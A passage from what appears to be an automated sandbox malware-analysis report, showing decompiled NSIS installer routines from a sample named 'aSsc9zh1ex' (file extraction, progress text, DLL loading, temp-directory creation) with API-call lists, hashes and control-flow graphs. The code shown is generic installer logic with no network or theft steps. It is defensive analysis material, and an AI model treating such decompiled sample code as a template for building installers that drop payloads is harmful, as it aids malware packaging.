                        						E0040651A(_t83, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp");
                        						_t64 = E00405B7A("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                        						__eflags = _t64;
                        						if(_t64 == 0) {
                        							continue;
                        						} else {
                        							__eflags = _t64 == 1;
                        							if(_t64 == 1) {
                        								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
                        								L32:
                        								_t51 = 0;
                        								__eflags = 0;
                        							} else {
                        								_push(_t81);
                        								_push(0xfffffffa);
                        								E0040557C();
                        								L29:
                        								_t51 = 0x7fffffff;
                        							}
                        						}
                        					}
                        					L33:
                        					return _t51;
                        				}
                        				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
                        				 *0x7a8b14 =  *0x7a8b14 + 1;
                        				_push(_t77);
                        				_push(_t77);
                        				_push( *(_t86 - 0x38));
                        				_push( *((intOrPtr*)(_t86 - 0x28)));
                        				_t45 = E004032B4(); // executed
                        				 *0x7a8b14 =  *0x7a8b14 - 1;
                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                        				_t84 = _t45;
                        				if( *(_t86 - 0x24) != 0xffffffff) {
                        					L22:
                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                        				} else {
                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                        						goto L22;
                        					}
                        				}
                        				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                        				__eflags = _t84 - _t77;
                        				if(_t84 >= _t77) {
                        					goto L31;
                        				} else {
                        					__eflags = _t84 - 0xfffffffe;
                        					if(_t84 != 0xfffffffe) {
                        						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
                        					} else {
                        						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
                        						lstrcatW(_t81,  *(_t86 - 8));
                        					}
                        					_push(0x200010);
                        					_push(_t81);
                        					E00405B7A();
                        					goto L29;
                        				}
                        				goto L33;
                        			}



















                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5
                          • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                          • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                          • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                          • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                          • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll$Call
                        • API String ID: 1941528284-1623154239
                        • Opcode ID: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
                        • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                        • Opcode Fuzzy Hash: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
                        • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 794 4032b4-4032cb 795 4032d4-4032dd 794->795 796 4032cd 794->796 797 4032e6-4032eb 795->797 798 4032df 795->798 796->795 799 4032fb-403308 call 4034ac 797->799 800 4032ed-4032f6 call 4034c2 797->800 798->797 804 40349a 799->804 805 40330e-403312 799->805 800->799 806 40349c-40349d 804->806 807 403445-403447 805->807 808 403318-40333e GetTickCount 805->808 809 4034a5-4034a9 806->809 812 403487-40348a 807->812 813 403449-40344c 807->813 810 4034a2 808->810 811 403344-40334c 808->811 810->809 814 403351-40335f call 4034ac 811->814 815 40334e 811->815 816 40348c 812->816 817 40348f-403498 call 4034ac 812->817 813->810 818 40344e 813->818 814->804 827 403365-40336e 814->827 815->814 816->817 817->804 828 40349f 817->828 821 403451-403457 818->821 822 403459 821->822 823 40345b-403469 call 4034ac 821->823 822->823 823->804 831 40346b-403470 call 4060bc 823->831 830 403374-403394 call 406a42 827->830 828->810 836 40339a-4033ad GetTickCount 830->836 837 40343d-40343f 830->837 835 403475-403477 831->835 838 403441-403443 835->838 839 403479-403483 835->839 840 4033f8-4033fa 836->840 841 4033af-4033b7 836->841 837->806 838->806 839->821 844 403485 839->844 842 403431-403435 840->842 843 4033fc-403400 840->843 845 4033b9-4033bd 841->845 846 4033bf-4033f0 MulDiv wsprintfW call 40557c 841->846 842->811 849 40343b 842->849 847 403402-403409 call 4060bc 843->847 848 403417-403422 843->848 844->810 845->840 845->846 853 4033f5 846->853 854 40340e-403410 847->854 852 403425-403429 848->852 849->810 852->830 855 40342f 852->855 853->840 854->838 856 403412-403415 854->856 855->810 856->852
                        C-Code - Quality: 95%
                        			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                        				signed int _v8;
                        				int _v12;
                        				intOrPtr _v16;
                        				long _v20;
                        				intOrPtr _v24;
                        				short _v152;
                        				void* _t65;
                        				void* _t69;
                        				long _t70;
                        				intOrPtr _t74;
                        				long _t75;
                        				intOrPtr _t76;
                        				void* _t77;
                        				int _t87;
                        				intOrPtr _t91;
                        				intOrPtr _t94;
                        				long _t95;
                        				signed int _t96;
                        				int _t97;
                        				int _t98;
                        				intOrPtr _t99;
                        				void* _t100;
                        				void* _t101;
                        
                        				_t96 = _a16;
                        				_t91 = _a12;
                        				_v12 = _t96;
                        				if(_t91 == 0) {
                        					_v12 = 0x8000;
                        				}
                        				_v8 = _v8 & 0x00000000;
                        				_v16 = _t91;
                        				if(_t91 == 0) {
                        					_v16 = 0x797700;
                        				}
                        				_t62 = _a4;
                        				if(_a4 >= 0) {
                        					E004034C2( *0x7a8ab8 + _t62);
                        				}
                        				if(E004034AC( &_a16, 4) == 0) {
                        					L41:
                        					_push(0xfffffffd);
                        					goto L42;
                        				} else {
                        					if((_a19 & 0x00000080) == 0) {
                        						if(_t91 != 0) {
                        							if(_a16 < _t96) {
                        								_t96 = _a16;
                        							}
                        							if(E004034AC(_t91, _t96) != 0) {
                        								_v8 = _t96;
                        								L44:
                        								return _v8;
                        							} else {
                        								goto L41;
                        							}
                        						}
                        						if(_a16 <= _t91) {
                        							goto L44;
                        						}
                        						_t87 = _v12;
                        						while(1) {
                        							_t97 = _a16;
                        							if(_a16 >= _t87) {
                        								_t97 = _t87;
                        							}
                        							if(E004034AC(0x793700, _t97) == 0) {
                        								goto L41;
                        							}
                        							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
                        							if(_t69 == 0) {
                        								L28:
                        								_push(0xfffffffe);
                        								L42:
                        								_pop(_t65);
                        								return _t65;
                        							}
                        							_v8 = _v8 + _t97;
                        							_a16 = _a16 - _t97;
                        							if(_a16 > 0) {
                        								continue;
                        							}
                        							goto L44;
                        						}
                        						goto L41;
                        					}
                        					_t70 = GetTickCount();
                        					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                        					_t14 =  &_a16;
                        					 *_t14 = _a16 & 0x7fffffff;
                        					_v20 = _t70;
                        					 *0x40ce40 = 0xb;
                        					_a4 = _a16;
                        					if( *_t14 <= 0) {
                        						goto L44;
                        					} else {
                        						goto L9;
                        					}
                        					while(1) {
                        						L9:
                        						_t98 = 0x4000;
                        						if(_a16 < 0x4000) {
                        							_t98 = _a16;
                        						}
                        						if(E004034AC(0x793700, _t98) == 0) {
                        							goto L41;
                        						}
                        						_a16 = _a16 - _t98;
                        						 *0x40ce30 = 0x793700;
                        						 *0x40ce34 = _t98;
                        						while(1) {
                        							_t94 = _v16;
                        							 *0x40ce38 = _t94;
                        							 *0x40ce3c = _v12;
                        							_t74 = E00406A42(0x40ce30);
                        							_v24 = _t74;
                        							if(_t74 < 0) {
                        								break;
                        							}
                        							_t99 =  *0x40ce38; // 0x79bd28
                        							_t100 = _t99 - _t94;
                        							_t75 = GetTickCount();
                        							_t95 = _t75;
                        							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                        								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                        								_t101 = _t101 + 0xc;
                        								E0040557C(0,  &_v152); // executed
                        								_v20 = _t95;
                        							}
                        							if(_t100 == 0) {
                        								if(_a16 > 0) {
                        									goto L9;
                        								}
                        								goto L44;
                        							} else {
                        								if(_a12 != 0) {
                        									_t76 =  *0x40ce38; // 0x79bd28
                        									_v8 = _v8 + _t100;
                        									_v12 = _v12 - _t100;
                        									_v16 = _t76;
                        									L23:
                        									if(_v24 != 4) {
                        										continue;
                        									}
                        									goto L44;
                        								}
                        								_t77 = E004060BC(_a8, _v16, _t100); // executed
                        								if(_t77 == 0) {
                        									goto L28;
                        								}
                        								_v8 = _v8 + _t100;
                        								goto L23;
                        							}
                        						}
                        						_push(0xfffffffc);
                        						goto L42;
                        					}
                        					goto L41;
                        				}
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CountTick$wsprintf
                        • String ID: ... %d%%$Z8@
                        • API String ID: 551687249-843941321
                        • Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                        • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                        • Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                        • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 857 40557c-405591 858 405597-4055a8 857->858 859 405648-40564c 857->859 860 4055b3-4055bf lstrlenW 858->860 861 4055aa-4055ae call 406557 858->861 863 4055c1-4055d1 lstrlenW 860->863 864 4055dc-4055e0 860->864 861->860 863->859 867 4055d3-4055d7 lstrcatW 863->867 865 4055e2-4055e9 SetWindowTextW 864->865 866 4055ef-4055f3 864->866 865->866 868 4055f5-405637 SendMessageW * 3 866->868 869 405639-40563b 866->869 867->864 868->869 869->859 870 40563d-405640 869->870 870->859
                        C-Code - Quality: 100%
                        			E0040557C(signed int _a4, WCHAR* _a8) {
                        				struct HWND__* _v8;
                        				signed int _v12;
                        				WCHAR* _v32;
                        				long _v44;
                        				int _v48;
                        				void* _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				WCHAR* _t27;
                        				signed int _t28;
                        				long _t29;
                        				signed int _t37;
                        				signed int _t38;
                        
                        				_t27 =  *0x7a7a44;
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					_t37 =  *0x7a8b14;
                        					_v12 = _t37;
                        					_t38 = _t37 & 0x00000001;
                        					if(_t38 == 0) {
                        						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
                        					}
                        					_t27 = lstrlenW(0x7a0f28);
                        					_a4 = _t27;
                        					if(_a8 == 0) {
                        						L6:
                        						if((_v12 & 0x00000004) == 0) {
                        							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
                        						}
                        						if((_v12 & 0x00000002) == 0) {
                        							_v32 = 0x7a0f28;
                        							_v52 = 1;
                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                        							_v44 = 0;
                        							_v48 = _t29 - _t38;
                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                        						}
                        						if(_t38 != 0) {
                        							_t28 = _a4;
                        							0x7a0f28[_t28] = 0;
                        							return _t28;
                        						}
                        					} else {
                        						_t27 = lstrlenW(_a8) + _a4;
                        						if(_t27 < 0x1000) {
                        							_t27 = lstrcatW(0x7a0f28, _a8);
                        							goto L6;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                        • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                        • lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                        • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                          • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                          • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID:
                        • API String ID: 1495540970-0
                        • Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                        • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                        • Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                        • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 871 406877-406897 GetSystemDirectoryW 872 406899 871->872 873 40689b-40689d 871->873 872->873 874 4068ae-4068b0 873->874 875 40689f-4068a8 873->875 877 4068b1-4068e4 wsprintfW LoadLibraryExW 874->877 875->874 876 4068aa-4068ac 875->876 876->877
                        C-Code - Quality: 100%
                        			E00406877(intOrPtr _a4) {
                        				short _v576;
                        				signed int _t13;
                        				struct HINSTANCE__* _t17;
                        				signed int _t19;
                        				void* _t24;
                        
                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                        				if(_t13 > 0x104) {
                        					_t13 = 0;
                        				}
                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                        					_t19 = 1;
                        				} else {
                        					_t19 = 0;
                        				}
                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                        				return _t17;
                        			}

                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                        • wsprintfW.USER32 ref: 004068C9
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                        • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                        • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 878 405a4b-405a96 CreateDirectoryW 879 405a98-405a9a 878->879 880 405a9c-405aa9 GetLastError 878->880 881 405ac3-405ac5 879->881 880->881 882 405aab-405abf SetFileSecurityW 880->882 882->879 883 405ac1 GetLastError 882->883 883->881
                        C-Code - Quality: 100%
                        			E00405A4B(WCHAR* _a4) {
                        				struct _SECURITY_ATTRIBUTES _v16;
                        				struct _SECURITY_DESCRIPTOR _v36;
                        				int _t22;
                        				long _t23;
                        
                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                        				_v36.Owner = 0x4083f8;
                        				_v36.Group = 0x4083f8;
                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                        				_v16.lpSecurityDescriptor =  &_v36;
                        				_v36.Revision = 1;
                        				_v36.Control = 4;
                        				_v36.Dacl = 0x4083e8;
                        				_v16.nLength = 0xc;
                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                        				if(_t22 != 0) {
                        					L1:
                        					return 0;
                        				}
                        				_t23 = GetLastError();
                        				if(_t23 == 0xb7) {
                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                        						goto L1;
                        					}
                        					return GetLastError();
                        				}
                        				return _t23;
                        			}

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                        • GetLastError.KERNEL32 ref: 00405AA2
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                        • GetLastError.KERNEL32 ref: 00405AC1
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3936084776
                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                        • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                        • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 884 732d1817-732d1856 call 732d1bff 888 732d185c-732d1860 884->888 889 732d1976-732d1978 884->889 890 732d1869-732d1876 call 732d2480 888->890 891 732d1862-732d1868 call 732d243e 888->891 896 732d1878-732d187d 890->896 897 732d18a6-732d18ad 890->897 891->890 900 732d187f-732d1880 896->900 901 732d1898-732d189b 896->901 898 732d18cd-732d18d1 897->898 899 732d18af-732d18cb call 732d2655 call 732d1654 call 732d1312 GlobalFree 897->899 906 732d191e-732d1924 call 732d2655 898->906 907 732d18d3-732d191c call 732d1666 call 732d2655 898->907 923 732d1925-732d1929 899->923 904 732d1888-732d1889 call 732d2b98 900->904 905 732d1882-732d1883 900->905 901->897 902 732d189d-732d189e call 732d2e23 901->902 915 732d18a3 902->915 918 732d188e 904->918 911 732d1885-732d1886 905->911 912 732d1890-732d1896 call 732d2810 905->912 906->923 907->923 911->897 911->904 922 732d18a5 912->922 915->922 918->915 922->897 927 732d192b-732d1939 call 732d2618 923->927 928 732d1966-732d196d 923->928 934 732d193b-732d193e 927->934 935 732d1951-732d1958 927->935 928->889 930 732d196f-732d1970 GlobalFree 928->930 930->889 934->935 936 732d1940-732d1948 934->936 935->928 937 732d195a-732d1965 call 732d15dd 935->937 936->935 938 732d194a-732d194b FreeLibrary 936->938 937->928 938->935
                        C-Code - Quality: 88%
                        			E732D1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                        				void _v36;
                        				char _v136;
                        				struct HINSTANCE__* _t37;
                        				intOrPtr _t42;
                        				void* _t48;
                        				void* _t49;
                        				void* _t50;
                        				void* _t54;
                        				intOrPtr _t57;
                        				signed int _t61;
                        				signed int _t63;
                        				void* _t67;
                        				void* _t68;
                        				void* _t72;
                        				void* _t76;
                        
                        				_t76 = __esi;
                        				_t68 = __edi;
                        				_t67 = __edx;
                        				 *0x732d506c = _a8;
                        				 *0x732d5070 = _a16;
                        				 *0x732d5074 = _a12;
                        				 *((intOrPtr*)(_a20 + 0xc))( *0x732d5048, E732D1651);
                        				_push(1); // executed
                        				_t37 = E732D1BFF(); // executed
                        				_t54 = _t37;
                        				if(_t54 == 0) {
                        					L28:
                        					return _t37;
                        				} else {
                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                        						E732D243E(_t54);
                        					}
                        					_push(_t54);
                        					E732D2480(_t67);
                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                        					if(_t57 == 0xffffffff) {
                        						L14:
                        						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                        								_push(_t54);
                        								_t37 = E732D2655();
                        							} else {
                        								_push(_t76);
                        								_push(_t68);
                        								_t61 = 8;
                        								_t13 = _t54 + 0x1018; // 0x1018
                        								memcpy( &_v36, _t13, _t61 << 2);
                        								_t42 = E732D1666(_t54,  &_v136);
                        								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                        								_t18 = _t54 + 0x1018; // 0x1018
                        								_t72 = _t18;
                        								_push(_t54);
                        								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                        								 *_t72 = 4;
                        								E732D2655();
                        								_t63 = 8;
                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                        							}
                        						} else {
                        							_push(_t54);
                        							E732D2655();
                        							_t37 = GlobalFree(E732D1312(E732D1654(_t54)));
                        						}
                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                        							_t37 = E732D2618(_t54);
                        							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                        								_t37 =  *(_t54 + 0x1008);
                        								if(_t37 != 0) {
                        									_t37 = FreeLibrary(_t37);
                        								}
                        							}
                        							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                        								_t37 = E732D15DD( *0x732d5068);
                        							}
                        						}
                        						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                        							goto L28;
                        						} else {
                        							return GlobalFree(_t54);
                        						}
                        					}
                        					_t48 =  *_t54;
                        					if(_t48 == 0) {
                        						if(_t57 != 1) {
                        							goto L14;
                        						}
                        						E732D2E23(_t54);
                        						L12:
                        						_t54 = _t48;
                        						L13:
                        						goto L14;
                        					}
                        					_t49 = _t48 - 1;
                        					if(_t49 == 0) {
                        						L8:
                        						_t48 = E732D2B98(_t57, _t54); // executed
                        						goto L12;
                        					}
                        					_t50 = _t49 - 1;
                        					if(_t50 == 0) {
                        						E732D2810(_t54);
                        						goto L13;
                        					}
                        					if(_t50 != 1) {
                        						goto L14;
                        					}
                        					goto L8;
                        				}
                        			}


                        APIs
                          • Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E74
                          • Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E79
                          • Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E7E
                        • GlobalFree.KERNEL32 ref: 732D18C5
                        • FreeLibrary.KERNEL32(?), ref: 732D194B
                        • GlobalFree.KERNEL32 ref: 732D1970
                          • Part of subcall function 732D243E: GlobalAlloc.KERNEL32(00000040,?), ref: 732D246F
                          • Part of subcall function 732D2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,732D1896,00000000), ref: 732D28E0
                          • Part of subcall function 732D1666: wsprintfW.USER32 ref: 732D1694
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$Free$Alloc$Librarywsprintf
                        • String ID:
                        • API String ID: 3962662361-3916222277
                        • Opcode ID: 56b79c3392e8a6a1c9e90bf340656f4db59d639e687123b380990f7f08d3fa6a
                        • Instruction ID: c76040e6b995f7b6b0c7ed404a840f3fbf8bf67e319d70a2e0fe7990f0c4b8be
                        • Opcode Fuzzy Hash: 56b79c3392e8a6a1c9e90bf340656f4db59d639e687123b380990f7f08d3fa6a
                        • Instruction Fuzzy Hash: 8841B871A303469BEB419F74E888BD537ACAF04315F188465ED4B9A8C6DBB8E0C4C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 941 406039-406045 942 406046-40607a GetTickCount GetTempFileNameW 941->942 943 406089-40608b 942->943 944 40607c-40607e 942->944 946 406083-406086 943->946 944->942 945 406080 944->945 945->946
                        C-Code - Quality: 100%
                        			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				intOrPtr _v8;
                        				short _v12;
                        				short _t12;
                        				intOrPtr _t13;
                        				signed int _t14;
                        				WCHAR* _t17;
                        				signed int _t19;
                        				signed short _t23;
                        				WCHAR* _t26;
                        
                        				_t26 = _a4;
                        				_t23 = 0x64;
                        				while(1) {
                        					_t12 =  *L"nsa"; // 0x73006e
                        					_t23 = _t23 - 1;
                        					_v12 = _t12;
                        					_t13 =  *0x40a57c; // 0x61
                        					_v8 = _t13;
                        					_t14 = GetTickCount();
                        					_t19 = 0x1a;
                        					_v8 = _v8 + _t14 % _t19;
                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                        					if(_t17 != 0) {
                        						break;
                        					}
                        					if(_t23 != 0) {
                        						continue;
                        					} else {
                        						 *_t26 =  *_t26 & _t23;
                        					}
                        					L4:
                        					return _t17;
                        				}
                        				_t17 = _t26;
                        				goto L4;
                        			}


                        APIs
                        • GetTickCount.KERNEL32 ref: 00406057
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                        Strings
